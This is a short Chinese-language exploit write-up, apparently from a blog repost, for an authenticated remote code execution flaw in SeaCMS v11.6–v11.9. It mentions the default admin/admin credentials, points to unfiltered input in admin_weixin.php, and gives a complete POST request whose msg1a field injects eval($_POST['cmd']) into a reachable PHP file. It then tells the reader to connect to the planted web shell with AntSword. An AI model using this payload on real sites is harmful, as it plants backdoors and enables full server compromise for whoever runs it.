赞
踩
0x00:利用说明
适用范围:SeaCMS v11.6-v11.9
前提条件:能登录进后台
后台默认为随机 6位字母+数字 的字符串
默认管理员账号/密码为 admin/admin
0x01:成因
/admin/admin_weixin.php 中,对拼接的字符串内容没有进行过滤,直接写入/data/admin/weixin.php 中,且/data/admin/weixin.php可以被直接访问
0x02:Exp
我搭建的后台为ub6bvf
- POST /ub6bvf/admin_weixin.php?action=set HTTP/1.1
- ......
-
- isopen=n&url=https%3A%2F%2Fwww.seacms.net&title=%E6%B5%B7%E6%B4%8B%E5%BD%B1%E8%A7%86&ckmov_url=https%3A%2F%2Fwww.seacms.net%2Fvip.php%3Furl%3D+&dpic=https%3A%2F%2Fwww.seacms.net%2Fapi%2Fwx.jpg&follow=%E6%84%9F%E8%B0%A2%E6%82%A8%E7%9A%84%E5%85%B3%E6%B3%A8%E3%80%82&noc=%E6%9A%82%E6%97%A0%E4%BD%A0%E8%A6%81%E7%9A%84%E5%86%85%E5%AE%B9%E3%80%82&help=%E8%BF%99%E6%98%AF%E5%B8%AE%E5%8A%A9%E4%BF%A1%E6%81%AF%E3%80%82&topage=d&dwz=n&dwztoken=dwztoken&sql_num=15&msg1a=%E5%85%B3%E9%94%AE%E8%AF%8D1");eval($_POST['cmd']);#
执行成功后访问...../data/admin/weixin.php,蚁剑链接,密码为 cmd
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。